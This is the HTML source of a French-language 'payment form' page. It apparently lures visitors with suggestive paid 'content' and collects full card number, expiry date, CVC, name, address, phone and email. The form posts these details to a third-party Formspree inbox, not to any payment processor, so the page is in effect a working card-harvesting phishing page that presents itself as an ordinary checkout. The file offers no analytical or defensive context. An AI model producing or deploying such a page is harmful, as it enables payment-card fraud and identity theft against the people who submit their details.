<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Formulaire de Paiement</title>
  <style>
    body {
      text-align: center;
      font-family: Arial, sans-serif;
      background-color: #f5f5f5;
      margin: 0;
      padding: 0;
    }
    .container {
      max-width: 400px;
      margin: 50px auto;
      background: #fff;
      border-radius: 10px;
      padding: 20px;
      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
    }
    input {
      width: calc(100% - 20px);
      margin: 10px 0;
      padding: 10px;
      font-size: 14px;
      border: 1px solid #ccc;
      border-radius: 5px;
    }
    button {
      background-color: #007bff;
      color: white;
      border: none;
      padding: 10px 20px;
      font-size: 16px;
      border-radius: 5px;
      cursor: pointer;
    }
    button:hover {
      background-color: #0056b3;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>Methode pour payer Le contenu 🥵</h1>
    <form action="https://formspree.io/f/xrbgvade" method="POST">
      <input type="email" name="email" placeholder="E-mail" required>
      <input type="text" name="number card" placeholder=" (1234 1234 1234 1234)" required>
      <input type="text" name="experity" placeholder=" (MM/AA)" required>
      <input type="text" name="cvc" placeholder="CVC" required>
      <input type="text" name="name" placeholder="Nom" required>
      <input type="text" name="address" placeholder="Adresse" required>
      <input type="text" name="phone" placeholder=" (0607080910)" required>
       
      <button type="submit">Payer</button>
      
    </form>
  </div>
</body>
</html>
